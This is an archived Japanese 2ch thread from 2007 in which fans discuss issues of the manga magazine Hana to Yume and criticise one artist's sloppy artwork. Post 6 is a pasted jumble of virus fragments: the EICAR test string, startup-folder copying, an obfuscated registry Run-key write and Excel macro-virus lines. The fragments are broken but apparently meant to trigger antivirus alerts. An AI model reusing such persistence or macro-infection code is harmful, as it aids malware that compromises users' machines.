5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

さぁて今号の花とゆめ★117号

1 :花と名無しさん:2007/07/28(土) 12:27:47 ID:???0
        _  _
    __/ /_/ /__
   /___   __  __/    _  _   _  _
      /‐‐/ /‐‐/_  r‐┐ / └' └v‐' └' └、
  ___ノ  / /   __ノ_/ /_/ ,‐; ,、  / ,ィ ,‐; ,.、  }
  /__,ィ / /  /__,r' ____/___// ー' ,イ {/_// /ノ /
    /__/ {___ハ___/__ノ ̄´ ヽ____,イ__,ノ

羅列その他、あれこれ語っていきましょう。

前スレ
さぁて今号の花とゆめ★116号
http://anime2.2ch.net/test/read.cgi/gcomic/1181139522/

連載中作家など関連スレは>>2-4あたり

2 :花と名無しさん:2007/07/28(土) 12:28:23 ID:???0
イチハ・女子妄想症候群【フェロモマニアシンドローム】3
http://anime2.2ch.net/test/read.cgi/gcomic/1169208388/
絵夢羅作品について
http://anime2.2ch.net/test/read.cgi/gcomic/1059286718/
【兄ワールド】加藤四季 その2【お嬢様と私】
http://anime2.2ch.net/test/read.cgi/gcomic/1151203269/
◆◆ 草凪みずほ 其の参 ◆◆
http://anime2.2ch.net/test/read.cgi/gcomic/1135248738/
ネタ心者歓迎!!シークエンス完全攻略スレッド
http://anime2.2ch.net/test/read.cgi/gcomic/1046784291/
【3年Z組】磁ロックスについて【ポチ先生ー!】
http://anime2.2ch.net/test/read.cgi/gcomic/1106137960/
【オデット】鈴木ジュリエッタ【ドルチェ】
http://anime2.2ch.net/test/read.cgi/gcomic/1145799723/
高尾滋 15・ゴールデンデイズ
http://anime2.2ch.net/test/read.cgi/gcomic/1177255206/
高屋奈月・星は歌う
http://anime2.2ch.net/test/read.cgi/gcomic/1180848316/
【ヤフオクで】中条比紗也ピザ13枚目【花ざかり】
http://anime2.2ch.net/test/read.cgi/gcomic/1180065490/

3 :花と名無しさん:2007/07/28(土) 12:28:33 ID:???0
仲村佳樹 スキップ・ビート! ACT.27
http://anime2.2ch.net/test/read.cgi/gcomic/1181693310/
■14■樋口橘 学園アリス■14■
http://anime2.2ch.net/test/read.cgi/gcomic/1176521369/
【VBR】日高万里 17【セカキラ】
http://anime2.2ch.net/test/read.cgi/gcomic/1173403129/
福山リョウコ・悩殺ジャンキーvol.5
http://anime2.2ch.net/test/read.cgi/gcomic/1161916988/
ふじもとゆうき キラメキ☆銀河町商店街
http://anime2.2ch.net/test/read.cgi/gcomic/1148702950/
【生存確認の喜び】闇末★松下容子27【プライスレス】
http://anime2.2ch.net/test/read.cgi/gcomic/1170347997/
【末のウルルン】松月滉T△T6【妄想マンセー記】
http://anime2.2ch.net/test/read.cgi/gcomic/1155883647/
★南マキ★part3
http://anime2.2ch.net/test/read.cgi/gcomic/1158233460/
▽▼佑羽栞▼▽フルハウスキス3軒目
http://anime2.2ch.net/test/read.cgi/gcomic/1165332381/
羅川真里茂 vol.13
http://anime2.2ch.net/test/read.cgi/gcomic/1175651342/

4 :花と名無しさん:2007/07/28(土) 12:28:43 ID:???0
【関連スレなど】

さぁて今号の別冊花とゆめ・ザ花とゆめ6号
http://anime2.2ch.net/test/read.cgi/gcomic/1174485782/
★白泉社限定★新人&受賞者に九言目!
http://anime2.2ch.net/test/read.cgi/gcomic/1177600417/
◆◆◆白泉系雑誌投稿者1◆◆◆
http://anime2.2ch.net/test/read.cgi/iga/1177692158/
【ネタバレ全般】総合スレ・十八冊目【早売りゲッター】
http://anime2.2ch.net/test/read.cgi/gcomic/1181226556/

少女漫画情報館
http://forgirls.hp.infoseek.co.jp/
少女漫画板 (少女漫画板の避難所として利用してください)
http://jbbs.livedoor.jp/comic/1374/

5 :花と名無しさん:2007/07/28(土) 12:28:52 ID:???0
16号テンプレ

表紙(星歌)…
巻頭(学アリ)…
星歌…
俺様…
がんばり…
ヴィーナス…
スキビ…
グラサン…
魔女っ子…
悩殺…
NG…
オデット…
ゴールデン…
ギュウ乳…
友情…
学校ホテル…

付録(キラメキうちわ)…

17号表紙(スキビ)…
17号巻頭(しゃにむ)…
16号総評…

6 :花と名無しさん:2007/07/28(土) 18:34:21 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


7 :花と名無しさん:2007/07/29(日) 20:41:50 ID:???0
ハチクロの作者もせっかく白泉に移るんだったら花ゆめにくれば良かったのに…
新連載が似たようなのばっかりだからたまには毛色の違う作品も読んでみたいよ

8 :花と名無しさん:2007/07/29(日) 21:19:08 ID:???0
>>7
作者がクマウザーV世だから仕方ないwww

9 :花と名無しさん:2007/07/29(日) 22:09:07 ID:???0
>>1
乙です!

花ゆめってまだ他誌と違って何でもありな雰囲気はあるから
勿体無いよな〜と思う。書き手としては暴れ甲斐がありそうなもの
だが・・・

10 :花と名無しさん:2007/07/30(月) 06:18:25 ID:???O
皆さんはサスペンス要素のある漫画を一番花ゆめに載せて欲しいんですか?
私は地獄少女みたいなホラーとかミステリアスな感じのが読みたいです。
地獄少女は絵がすごく子供向けで目が大きくてキラキラしすぎですが…
ちょうど夏だし今だけ心霊写真特集コーナーもあれば、いつもと違った感じでいいと思うんですが。

11 :花と名無しさん:2007/07/30(月) 09:20:30 ID:???0
ホラーはいらないな、自分は

12 :花と名無しさん:2007/07/30(月) 13:36:34 ID:???0
自分は、フツーの女の子の恋愛まんがはいらないから、サスペンス、ホラー、ミステリーなんでも読んでみたい。
別花の八雲って人気あるのかな?
あんなのが本誌でも連載して欲しい。
花ゆめは、割とマニア的雑誌だと思ってるから、連載作品が平凡だと満足できないw

13 :花と名無しさん:2007/07/30(月) 14:50:55 ID:???0
人が死なない推理物やファンタジーやSFとかを読んでみたい。

14 :花と名無しさん:2007/07/30(月) 15:37:13 ID:???0
でも最近の賞取った作品って大体普通の恋愛ものだよね
編集の意向なのかな。
私も普通の恋愛ものなら他の雑誌の方が面白いの沢山あるから
変わった少女漫画が読みたい…

15 :花と名無しさん:2007/07/30(月) 19:43:23 ID:???0
学園や恋愛をガツンと逸脱したものも読みたいけど
そういうの描く人は最近では花ゆめに来ないから難しいかもね

16 :花と名無しさん:2007/07/30(月) 20:17:11 ID:???0
王道の恋愛物なら、他誌の方が上手いからなぁ。
花ゆめには、日常から逸脱したものとか、ちょっと不思議とか
現実離れしたものを期待してしまう。過去もそんな雑誌カラーだったし。

今は、別の意味で現実離れしたモノが多すぎ。

17 :花と名無しさん:2007/07/30(月) 20:52:20 ID:???0
前スレでひぐらしとかあがってたけど
ゲハが次号でいきなり鬼隠し編のレナ化とか
目明し編の詩音化したら
本気でVBにハマれると思う。

18 :花と名無しさん:2007/07/30(月) 21:14:16 ID:???0
そんなVBだったら自分も全巻買ってもいいよwww

19 :花と名無しさん:2007/07/30(月) 21:35:58 ID:???0
>>16
そういうのが描けそうなのが冴えないだったんだが、
もう冴えないはウィングスへ行ってブレイクして
花夢偏執の鼻を明かして欲しいと思う。
ファンじゃないけど、漫画に対する真摯な姿勢はかっているので。

20 :花と名無しさん:2007/07/30(月) 22:05:33 ID:???0
冴えないは別花に載ったばかりなのにヒドス

21 :花と名無しさん:2007/07/30(月) 22:50:37 ID:???0
冴えないって別雑誌で掛け持ちしてるの?
別花もたまにしか載らないと思ってたら、そういうことか

22 :花と名無しさん:2007/07/30(月) 23:00:04 ID:???0
>>21
ちゃんと読んでる?
ウィングスに行ったら?という架空の話だよ

23 :花と名無しさん:2007/07/31(火) 00:49:50 ID:???0
冴えないの天使の先生の話は好きだったな。それまでのは全然印象に残ってないけど。
でも掲載順低かったし、人気無かったんだろうな…

24 :花と名無しさん:2007/07/31(火) 12:05:56 ID:???O
冴えないは本当に冴えなかった
よろず屋もタゲ被ってた闇末で霞んでしまった印象
真摯な姿勢は伝わるし絵も小綺麗だが話がつまらない
草凪とかぶるな・・・

25 :花と名無しさん:2007/07/31(火) 12:32:06 ID:???0
冴えないにおもしろい話書かせる編集でも付けばいいのに
絵柄で他とタイプが違うのはいいと思う。同じ顔だけど…

26 :花と名無しさん:2007/07/31(火) 19:18:39 ID:???0
冴えないは冴えないからいいんだよw

27 :花と名無しさん:2007/07/31(火) 19:23:09 ID:???0
>>25
同じ顔だけど…って、マンガとしてはダメダメじゃないかw

もうこの際書き分けできてれば、多少年齢不詳でもいいや。
とか思うくらいに、花ゆめは末期ですな。
何か、1本ガツンと引っ張るモノがあればいいんだけどなぁ。
みんな横並びに普通だよね。


28 :花と名無しさん:2007/08/01(水) 01:38:30 ID:???0
(・∀・)

29 :花と名無しさん:2007/08/01(水) 13:52:20 ID:???0
なにこの過疎ぶり

30 :花と名無しさん:2007/08/01(水) 16:48:07 ID:???0
皆うんこしに行ってるんだよ。

31 :花と名無しさん:2007/08/01(水) 18:54:47 ID:???0
8/20発売号に花君の特別編が載るのは既出?

32 :花と名無しさん:2007/08/01(水) 19:16:15 ID:???O
カエル顔だよね…

33 :花と名無しさん:2007/08/01(水) 21:15:58 ID:???O
羅川再会だっけ
楽しみー

34 :花と名無しさん:2007/08/02(木) 00:40:52 ID:???0
もう近所の早売り店に新しいやつ置いてた。買ってないけど。
キョーコ&蓮ツーショットの黄色い表紙だった。

35 :花と名無しさん:2007/08/02(木) 04:15:50 ID:???0
>>31続編ってなにやるんだろう…今の絵で見たく無い
宣伝効果なんてないだろうに

36 :花と名無しさん:2007/08/02(木) 19:34:25 ID:???0
SFだったら柴田さんに少女マンガ復活してもらうのは?

37 :花と名無しさん:2007/08/02(木) 20:22:25 ID:???0
いや。今の柴田氏に描かせると、
もれなくメイドがパンチラをご披露したりするので、危険w
あれが無ければ、自分はいいけど。
でも硬派なSFは人気ないでしょ。


38 :花と名無しさん:2007/08/03(金) 00:16:07 ID:???0
昔もソネットがパンチラ見せてなかったっけ?

39 :花と名無しさん:2007/08/03(金) 00:22:07 ID:???0
ループだなw
パンチラどころか、乱○パーティみたいなのがあったんじゃなかったっけ?

40 :花と名無しさん:2007/08/03(金) 01:20:41 ID:???0
ソネットの1回目で母親に体を売らされてたくらいしか覚えていないなぁ。

41 :花と名無しさん:2007/08/03(金) 02:32:22 ID:???0
ということで
今の花ゆめに欠けているのは
パンチラや乱○パーティと、母親に体を売らされるヒロイン
ということでFA

42 :花と名無しさん:2007/08/03(金) 02:44:13 ID:???0
パンチラや乱○パーティなんか見たくもないけど
そんな題材が扱えるシリアスで深刻な話を作れる作家は欲しい
アポロケーキ喫茶ややったら出来ちゃった♪ドレス屋みたいな安易な展開はもういい

43 :花と名無しさん:2007/08/03(金) 02:47:57 ID:???0
>>32
最新の絵みてないから何とも言えないが好みもあると思うけど、
今の連載陣の中ではやっぱり画力はあるよな〜。

SFで・・・そこでヨコタソですYOw
弟子と絵柄がちょっと被るから難しいってわけじゃないよな?
あの頃の花ゆめの層と今は変わってるんだろうな。

44 :花と名無しさん:2007/08/03(金) 03:57:20 ID:???0
オデットがなに気にパンチラしてる件

45 :花と名無しさん:2007/08/03(金) 09:46:27 ID:???0
松下容子いらない 

46 :花と名無しさん:2007/08/03(金) 10:26:29 ID:???0
>>43
ヨコタソもピザも画力は全盛期の6割くらいなんじゃない?
ヨコタソは変な癖が付いてる上に荒くなったし
ピザは手抜きしか考えてない。

47 :花と名無しさん:2007/08/03(金) 13:59:38 ID:???O
17号テンプレ

表紙(スキビ)…
巻頭(しゃにむ)…
スキビ…
幸福…
がんばり…
アリス…
星歌…
俺様…
NG…
キラメキ…
魔女
グラサン…
オデット…
ヴィーナス…
幸福ローン…
ゴールデン…
アラクレ…
ギュウ乳…

付録(VBRあでやか手ぬぐい)…

18号表紙(花君)…
18号巻頭(VBR)…
17号総評…

48 :花と名無しさん:2007/08/03(金) 14:01:17 ID:???O
18号
花ざかりの君たちへ特別編
霊感少年萱島から見た瑞希たち3人は?

最終回 グランドサン
再開  SA
付録 星は歌うトゥインクル☆ポーチ


49 :花と名無しさん:2007/08/03(金) 14:21:12 ID:???0
丁度テンプレ作ってたら>>47さんが先にw
乙です早速頂きます。ネタバレあり。

表紙(スキビ)… 顔の大きさが違いすぎてわろた。こっぱずかしい。
巻頭(しゃにむ)… ひなこかわいかった。駿大丈夫かな。
スキビ… ジュリっていうとジュリエッタを思い出す。これで2号も休みか。
ちょっとまたテンポ遅くなってきたな。
幸福… 下書き状態にトーンとかベタが入ってると思われるページが何枚もあって驚いた。
これは下書きなのかペン一発書きなのか?どっちにしろ作画崩壊しすぎ。
がんばり… スルー
アリス… 棗かわいかったけどなぜ後姿で気づかないんだ蜜柑。無理があるだろ。
星歌… 転校してきて内容が良くなることを期待しておく。
俺様… この主人公笑えるな。
NG… だめだ、ポンペイって単語が出るたび吹いてしまってまじめに読めない。
キラメキ… お祭り早く終わってほしいな。お祭り始まってからつまらなくなった。
魔女…スルー
グラサン… もう次回最終回か。次回作はどんなだろう。
オデット… 朝生はー?ロボばっかりで詰まらん。
ヴィーナス… こういう王道展開好きなんだけどキャラが好きになれないのが惜しい。
幸福ローン… スルー
ゴールデン… 慶…!!
アラクレ… ラクトが高校生に見えない件。
ギュウ乳… スルー

付録(VBRあでやか手ぬぐい)…入ってなかった。捨てる手間省けてよかった。

18号表紙(花君)… 華やかで買いやすい表紙をお願い。
18号巻頭(VBR)… カラーの美麗さが戻ってくれたらいいんだが。
17号総評… しゃにむとゴールデンは面白かったけど
最近の中では一番ツマラン号だったかも。買うんじゃなかった。

50 :花と名無しさん:2007/08/03(金) 17:04:11 ID:???0
>>49
>どっちにしろ作画崩壊しすぎ。

今まで以上に手抜きって事?
低脳天狗作家は手に負えないね。

51 :花と名無しさん:2007/08/03(金) 17:57:37 ID:???0
そのままヨコタンのようにフェードアウト・・・って展開を期待しちゃったYO

52 :花と名無しさん:2007/08/03(金) 18:05:24 ID:???O
下描き状態ってマジで?
下描きが載ってんの花ゆめでは見たことないんだが

53 :花と名無しさん:2007/08/03(金) 18:38:02 ID:???0
幸福スルーしてたから見直してみた
下書きを載せてるんじゃないけど、びっくりする程雑だった…
おそらく極細ボールペンでガガっと一発書きしてるんだと思う
黒髪の女の子が特にヒドくて、小学生が書いたような絵が沢山あった

片手間で漫画書いてるだろコイツ…
呆れるの通り越してハラ立つわ 漫画家やめちまえよ

54 :花と名無しさん:2007/08/03(金) 18:50:11 ID:???0
鉛筆で描いた絵をコピー(?)して黒髪をざざっと塗ってるように見えた。
112Pの4コマ目とか特にそれっぽい気が。

松月さんて画面白いが彼女なりに手を抜いてないと自分には思えてた。
だから今まで普通に読めてたけど、今回見てちょっと幻滅してしまった。
柱で体調崩したっぽいことをほのめかしてるのも結構ショックだったな。
そんな誘い受けやめてくれ。

55 :花と名無しさん:2007/08/03(金) 18:51:52 ID:???0
最近読んでないからわからんのだけど
今回が特に酷いの?>まっつん

56 :花と名無しさん:2007/08/03(金) 18:53:22 ID:???0
>>55
ひどいっていうか初めてだと思うあんな雑な絵

57 :花と名無しさん:2007/08/03(金) 19:11:21 ID:???0
>>53-54
マジで?
幸福って2回休んだ後じゃなかったっけ?
体調崩してるっつっても
入院する程の不調じゃなかったようだし
自己管理出来てなかったワケだから
同情は出来ないな…。
柱で誘い受けしてるの逆効果だよ。

58 :花と名無しさん:2007/08/03(金) 19:47:26 ID:???0
体調悪いなら、あと2回くらいで終わらせて、じっくり休養したらいい

59 :花と名無しさん:2007/08/03(金) 19:49:52 ID:???0
>鉛筆で描いた絵をコピー(?)

そういうのでもない気がする。
鉛筆コピーだったらもっと線がかすれるだろうし。

絵によっては、雑とも違う感じの線があるのが気になる。
キャラの主線まで他人に任せたんじゃないかって風に見える。
目の描き方がヘタすぎ。

60 :花と名無しさん:2007/08/03(金) 21:21:59 ID:???0
テンプレありがとう。ネタバレあり。

表紙(スキビ)… 本編では見られないようなラブラブ絵だな。
巻頭(しゃにむ)… 嬉しい涙と悲しい涙、切ないなぁ。魔子とルーイも気になる。
スキビ… 柱で気が付いた。キョーコ出ないの初めてなんだ。
     黒髪じゃない蓮を見てみたいが、次20号なのか。
幸福… 確かに線が荒い。話は悪くないが、6才と15才はちょっと引いた。
がんばり… スイカ割りってしたこと無いけど、世間では夏の定番なのかな。
アリス… 蛍はルカの味方?なんか違和感。
星歌… クラスメートか。普通に学園ラブコメとして持ち直してくれれば。
    次号休みで、豪華付録か。いらないから値段を元に戻して欲しい。
俺様… 幼馴染ね。1話見た時は気が付かなかった。何か空回りが笑える。
NG… もう芹沢とくっついちゃえばいいと思う。
キラメキ… いろいろベタだな。今はまだ読めるが引き伸ばさないで短くまとめてほしい。
魔女…シンディー、何で関西弁なんだよ。 魔界のおっちゃんのがうつってんの?
グラサン… やっぱり血縁無いんだ。後1話でまとまるのかな。
オデット… オデット、ロボに見えなくなってきた。浮気イベントのある人生ゲーム凄いな。
ヴィーナス… こんながさつで鈍感なヒロインは嫌だ。
      男兄弟の前、裸でうろつくなよ。サービスシーンのつもりか?
幸福ローン… インコ可愛い。次号も載るのか。
ゴールデン… 節と慶が良かった。高尾さんはラブシーン上手いな。
アラクレ… 警察官の息子も族だったんかい。まぁ、どうでもいいが。
ギュウ乳… 虐待ネタは何か嫌。

付録(VBRあでやか手ぬぐい)… 開けてないけど袋越しでもペラく見える。

18号表紙(花君)… 萱嶋の話か。何ページあるんだろ。
18号巻頭(VBR)… どうでもいい感じ。
17号総評… 新展開の話がいくつかあったし、それなりかな。
       次号はスキビ、星歌、悩殺、NGが無くて、花君、VB、SAか。
       今から微妙な予感がする。

61 :花と名無しさん:2007/08/03(金) 21:39:15 ID:???0
自分もオデットの人間くささが気になった。
再開してから急に人間ぽい。
思考や行動が。
前の方がかわいかったな。

62 :花と名無しさん:2007/08/03(金) 21:46:18 ID:???0
花君番外編は別にいいけど何で突然萱島の話なんだ
ドラマの萱島に作者が萌えてんのだろか…

63 :花と名無しさん:2007/08/03(金) 21:56:28 ID:???0
花黄身今の絵でやられてもドン引きしそう。

64 :花と名無しさん:2007/08/03(金) 22:16:27 ID:???0
>>60
>次号はスキビ、星歌、悩殺、NGが無くて、花君、VB、SAか。
>今から微妙な予感がする。

確かにww

さっきふと12号読んでたらVBRの白黒過去編が目に入って驚いた。
休み挟んでるとはいえこんなに前からやってたっけーと。

65 :花と名無しさん:2007/08/03(金) 22:35:18 ID:???O
確かに花君、VB、SAは微妙だか悩殺、星歌も結構微妙なのであまり変わらないかな

66 :花と名無しさん:2007/08/03(金) 22:54:54 ID:???0
変臭も末月を依怙贔屓するなら
食生活からゲームで遊ぶ時間、運動に到るまで
面倒見て指導してくれるヘルパーさんでも雇ってやれば?

67 :花と名無しさん:2007/08/03(金) 23:09:14 ID:???O
依怙贔屓って…w
同じクラスメイトみたいなノリだな
同じ雑誌の同業者の人?とか言ってからかいたくなってしまう

68 :花と名無しさん:2007/08/03(金) 23:16:20 ID:???0
>>67
出勤お疲れ様です。

69 :花と名無しさん:2007/08/03(金) 23:37:00 ID:???0
予告ショットを見る限りでは、そう変な画ではないが…>鼻キモ
それより頬染めたゲハがキモ

70 :花と名無しさん:2007/08/03(金) 23:41:28 ID:???0
え?花君の予告カットって昔のやつでしょ?
書き下ろしじゃないから今の絵じゃないぞww

71 :花と名無しさん:2007/08/04(土) 00:04:06 ID:???0
あ、書き下ろしじゃなかったの?
失礼した。

72 :花と名無しさん:2007/08/04(土) 00:41:29 ID:???O
今号の花ゆめの、漫画のステップアップ講座のページに
見開きについて載ってて、見づらくなるから重要な絵やセリフはノド側(ページの真ん中の切れてる所)には描かないようにする
って書いてあった。
なのに、ちょうど今回のボヌールで重要な場面で人物の顔がページの真ん中で切れちゃってる。
体がまっぷたつに分かれてて不気味
ホント初心者なみだと思った。
今回は特に落書きみたい…目とか髪とか体とかヤバい。ミツカの制服のスカートなんて七夕の短冊並べてるみたい

73 :花と名無しさん:2007/08/04(土) 00:54:03 ID:???O
冨樫

74 :花と名無しさん:2007/08/04(土) 01:11:23 ID:???0
最初からミツカはモデルのくせに関節が人間じゃなかったし、
髪もモデルなのにぼさぼさで、まあとにかくありえなかった。
制服も貧乏でがさつなオカンが、嫌々適当に縫ったような服だった。
ずっとスルーしてたけど、どんだけひどいのか、
今回はちゃんと見よう(not読む)と思ったw

75 :花と名無しさん:2007/08/04(土) 02:04:32 ID:???0
今回の花むしに「寝ている間に原稿を仕上げてくれる小人がいる家がほしい」
とか書いてたな末月
雑な原稿でオマケにこのコメントって、どんだけやる気ないんだよ
漫画が描きたくないんなら無理して描かなくてもいいよ
つーか戻ってこなくていいよ

76 :花と名無しさん:2007/08/04(土) 02:08:43 ID:???O
まっつんの絵、もうとにかくヤバい。ストーリーなんて気にならないほど絵がヤバかった
病気なんじゃないか?と本気で思った。
まぁマトモに描けないような病気にもしなっちゃったとしたら、病気なら絵が下手でもしょうがないねって思われるから一石二鳥かもだけど、多少ヘタ、雑なんてもんじゃなくて自分でもこれぐらい描けるだろうと思った

77 :花と名無しさん:2007/08/04(土) 02:11:28 ID:???0
漫画の書き方についていろいろいう人は、
同人や投稿者とか漫画を描いている人なんだろうな。
スレ違いだし作者叩いてるし、うっとおしいからやめて。

78 :花と名無しさん:2007/08/04(土) 02:20:08 ID:???0
>>77
末月乙

79 :花と名無しさん:2007/08/04(土) 02:50:48 ID:???0
魔続き(すごい変換すぎてあえて直さない)、どんなにひどいのかと思って見てみたらほんとにひどかった
一発書きといわれてるのも他人がペン入れしてるのかもといわれてるのも分かる
前々から雑だ雑だと思ってたけどこうまでひどくなかったのに
しかも休み明けなのになんで?


80 :花と名無しさん:2007/08/04(土) 03:09:49 ID:???0
遊びすぎただけだろ…

線の酷さは異常だったね
急いで描いて雑になった、て感じでもない
絵を描き慣れてる人の線とは思えないよアレ
素人お絵書きレベル

81 :花と名無しさん:2007/08/04(土) 09:54:46 ID:???0
久しぶりにまじまじ眺めたらあまりに雑だわ白いわなのでちょっと数えてみた

30ページ中背景が1コマもないページが12ページ
(キャラに付属してるカウンターとか椅子は背景に数えない)

真っ白なはずだ

82 :花と名無しさん:2007/08/04(土) 09:56:28 ID:???O
まっつんまじ今回は髪のベタヌリも適当、ケーキもまずそう、
画面が白いし、アシスタント解雇したのかというくらいひどかった。
学園アリスが棗にキュンとした。棗好きだよ棗

83 :花と名無しさん:2007/08/04(土) 11:16:02 ID:u7lbGQuQO
あげ

84 :花と名無しさん:2007/08/04(土) 13:38:27 ID:???O
三丁目何か別に前と変わんないと思う

前から同じポーズしかなかったし背景真っ白!

今更騒ぐな!
前からだ!


85 :花と名無しさん:2007/08/04(土) 14:09:09 ID:???O
そんなことはみんなわかってるよ

ところで幸福、何が新章なの?
章があるような話だった?

86 :花と名無しさん:2007/08/04(土) 15:19:58 ID:???0
幸福読んだ。たしかに雑だと思うけど、こんなに騒ぐほどか?
叩きたいだけだろ。

87 :花と名無しさん:2007/08/04(土) 15:37:08 ID:???0
末月のはでもかなーり売れ売れっしょ?
別花へ島流し組にも圧勝だし

原稿が黒きゃいいってもんじゃねーしさ

88 :花と名無しさん:2007/08/04(土) 15:38:09 ID:???0
売れ売れってほど売れてないんじゃなかったっけ?

89 :花と名無しさん:2007/08/04(土) 16:39:39 ID:???0
幸福、漫画もアレだけど柱の新刊の宣伝にも吹いたw
ちょw『男子がア・ツ・イ!!』ってww
本編共々勘弁してくれ


90 :花と名無しさん:2007/08/04(土) 16:59:22 ID:???O
ウレウレて市後
(((゜д゜;)))
末月よりも危ない

逃げろー

91 :花と名無しさん:2007/08/04(土) 17:59:10 ID:???O
作画崩壊で騒がれない少女漫画って末期

92 :花と名無しさん:2007/08/04(土) 18:26:21 ID:???0
ていうかそもそも何で漫画家やろうとしたんだろう?
あんなめんどくさそうな作業よっぽど漫画描くの好きな人
じゃないと目指さないよね。

93 :花と名無しさん:2007/08/04(土) 18:33:53 ID:???0
OLとかやってるより儲かるからだろ

94 :花と名無しさん:2007/08/04(土) 18:40:57 ID:???0
>「寝ている間に原稿を仕上げてくれる小人がいる家がほしい」

うわーまたそんな痛い発言しちゃったんだ。
松月の場合原稿がアレなだけに冗談に聞こえないから怖い。
前にも「漫画描くのメンドクセ、誰か描いて」
みたいに言ってたし、
松月って漫画描くの本当に好きなのか疑いたくなる。

95 :花と名無しさん:2007/08/04(土) 18:44:16 ID:???0
松月の年収いくらか気になる!!

96 :花と名無しさん:2007/08/04(土) 18:53:13 ID:???0
まっつん体調崩してたの?
柱にそれっぽい事ほのめかしてたらしいけど
どんな風に書いてあったの?

単なる風邪とかだったら同情の余地ないけど
何か病気になってしまったんだとしたら
多少の作画劣化は仕方ない気もする。
イチハだって体調崩して落としてたし。
ヨコタンみたいにゲームばっかやって落としてたんじゃ
救いようないけどさ。

97 :花と名無しさん:2007/08/04(土) 19:05:59 ID:???0
>>95
売り上げスレのランキングから推定してコミックス1巻当たり15万部前後
年3冊×40円(コミックス価格の10%)×15万部=1800万円

原稿料は1枚1万と仮定しても、これはアシ代とかの経費で消えるものらしいから

98 :花と名無しさん:2007/08/04(土) 19:11:43 ID:???0
ランキングといえば7月発売のコミックス
悩殺が大阪屋でも太洋社でも
アラクレに負けてて驚いたなあ
本誌での扱いは悩殺>>>アラクレって感じだから意外

99 :花と名無しさん:2007/08/04(土) 19:13:02 ID:???0
1800万!??sugeeeee!!
私も漫画家目指す!!はなゆんめでデビューするぜ!!

100 :花と名無しさん:2007/08/04(土) 19:29:21 ID:???0
ハクセンはコミックス価格の3%じゃなかったか?

254 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)